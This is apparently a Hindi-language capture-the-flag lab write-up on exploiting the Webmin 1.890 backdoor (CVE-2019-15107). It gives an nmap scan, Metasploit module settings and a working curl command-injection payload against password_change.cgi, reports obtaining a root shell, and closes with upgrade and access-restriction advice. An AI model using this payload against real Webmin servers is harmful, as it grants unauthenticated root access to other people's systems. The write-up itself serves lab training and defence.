
अनुसंधान उद्देश्य: Webmin संस्करण 1.890 (CVE-2019-15107) में एक Remote Code Execution (RCE) भेद्यता का व्यापक विश्लेषण और सफल शोषण करना, अंततः लक्ष्य प्रणाली पर पूर्ण नियंत्रण प्राप्त करना।
शोध उद्देश्य: Webmin संस्करण 1.890 (CVE-2019-15107) में एक रिमोट कोड एक्सिक्यूशन (RCE) कमजोरी का व्यापक विश्लेषण और सफल शोषण करना, अंततः लक्ष्य प्रणाली पर पूर्ण नियंत्रण प्राप्त करना।
कार्यप्रणाली:
प्रारंभिक टोही:
Nmap का उपयोग करके नेटवर्क स्कैनिंग की गई:
bash nmap -sV -sC -A -p- 10.201.105.185
पोर्ट 10000 पर चल रही Webmin 1.890 सेवा की पहचान की गई
कमजोरी विश्लेषण:
password_change.cgi में कमजोरी तंत्र की जांच की गई
बिना प्रमाणीकरण के मनमानी कमांड निष्पादन की संभावना की पुष्टि की गई
शोषण:
दो आक्रमण वेक्टर लागू किए गए:
Metasploit Framework का उपयोग करके:
bash use exploit/linux/http/webmin_backdoor set RHOSTS 10.201.105.185 set LHOST tun0 exploit
curl के माध्यम से मैनुअल शोषण:
bash curl -k "https://10.201.105.185:10000/password_change.cgi" -d "user=root&pam=&expired=2&old=test|id&new1=test&new2=test"
शोषण के बाद:
इंटरैक्टिव रूट शेल प्राप्त किया
फाइलसिस्टम विश्लेषण किया
फ्लैग फाइलें खोजी गईं:
bash /home/dark/user.txt /root/root.txt
निष्कर्ष:
CVE-2019-15107 कमजोरी का सफलतापूर्वक शोषण किया गया
सिस्टम पर पूर्ण रूट विशेषाधिकार प्राप्त किए गए
समय पर सॉफ्टवेयर अपडेट के महत्वपूर्ण महत्व को प्रदर्शित किया गया
तकनीकी निष्कर्ष:
कमजोरी "old" पैरामीटर इंजेक्शन के माध्यम से मनमानी कमांड निष्पादन की अनुमति देती है
प्रमाणीकरण जांचों की कमी इसे विशेष रूप से खतरनाक बनाती है
संस्करण 1.890 में एक बैकडोर है जिसे बाद के रिलीज में पैच किया गया
सुरक्षा अनुशंसाएँ:
वर्तमान Webmin संस्करण में तत्काल अपग्रेड करें
आईपी द्वारा प्रबंधन पैनल तक पहुंच प्रतिबंधित करें
वेब अनुप्रयोगों का नियमित सुरक्षा ऑडिट करें
आगे के शोध दिशाएँ:
अन्य Webmin कमजोरियों का विश्लेषण
Metasploit के बिना कस्टम एक्सप्लॉइट का विकास
समझौता किए गए सिस्टम में स्थायित्व तकनीकों की जांच
यह केस स्टडी समय पर सिस्टम अपडेट के महत्वपूर्ण महत्व और तैनात सॉफ्टवेयर में निरंतर कमजोरी निगरानी की आवश्यकता को प्रदर्शित करता है। यह शोध आधुनिक वेब एप्लिकेशन शोषण तकनीकों में व्यावहारिक अंतर्दृष्टि प्रदान करता है, साथ ही बुनियादी सुरक्षा सिद्धांतों पर जोर देता है।